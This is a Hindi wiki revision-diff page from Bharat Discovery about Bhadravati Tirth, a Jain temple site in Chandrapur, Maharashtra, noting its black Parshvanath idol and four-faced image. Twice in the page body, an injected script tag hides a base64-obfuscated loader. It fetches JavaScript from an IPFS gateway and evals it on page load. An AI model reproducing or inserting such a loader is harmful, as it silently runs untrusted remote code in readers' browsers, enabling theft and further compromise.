Difference between revisions of "भद्रवती तीर्थ चन्द्रपुर"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
m (Text replace - " मे " to " में ")
 
(One intermediate revision by one other user not shown)
Line 1: Line 1:
*भद्रवती तीर्थ [[महाराष्ट्र]] के [[चन्द्रपुर]] शहर मे स्थित है।  
+
*भद्रवती तीर्थ [[महाराष्ट्र]] के [[चन्द्रपुर]] शहर में स्थित है।  
 
*चन्द्रपुर में स्थित श्री भद्रवती तीर्थ के [[जैन]] मन्दिर पूरे ज़िले में प्रसिद्ध हैं।  
 
*चन्द्रपुर में स्थित श्री भद्रवती तीर्थ के [[जैन]] मन्दिर पूरे ज़िले में प्रसिद्ध हैं।  
*भगवान केसरिया जी [[पार्श्वनाथ]] इन मन्दिरों के मुख्य आराध्य देव हैं। उनकी [[काला रंग|काले रंग]] की प्रतिमा काफ़ी आकर्षक है।  
+
*भगवान केसरिया जी [[तीर्थंकर पार्श्वनाथ|पार्श्वनाथ]] इन मन्दिरों के मुख्य आराध्य देव हैं। उनकी [[काला रंग|काले रंग]] की प्रतिमा काफ़ी आकर्षक है।  
 
*मूर्ति अर्धपदमासन मुद्रा में स्थापित है। जिस की ऊंचाई 152 सेमी. के क़रीब है।  
 
*मूर्ति अर्धपदमासन मुद्रा में स्थापित है। जिस की ऊंचाई 152 सेमी. के क़रीब है।  
 
*भद्रवती गाँव के निकट एक ख़ूबसूरत बगीचे में स्थित इस दो मंज़िला मन्दिर की मुख्य विशेषता चतुर्मुख मूर्ति है।
 
*भद्रवती गाँव के निकट एक ख़ूबसूरत बगीचे में स्थित इस दो मंज़िला मन्दिर की मुख्य विशेषता चतुर्मुख मूर्ति है।

Latest revision as of 07:59, 20 February 2011

  • bhadravati tirth maharashtr ke chandrapur shahar mean sthit hai.
  • chandrapur mean sthit shri bhadravati tirth ke jain mandir poore zile mean prasiddh haian.
  • bhagavan kesariya ji parshvanath in mandiroan ke mukhy aradhy dev haian. unaki kale rang ki pratima kafi akarshak hai.
  • moorti ardhapadamasan mudra mean sthapit hai. jis ki ooanchaee 152 semi. ke qarib hai.
  • bhadravati gaanv ke nikat ek khoobasoorat bagiche mean sthit is do manzila mandir ki mukhy visheshata chaturmukh moorti hai.

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

sanbandhit lekh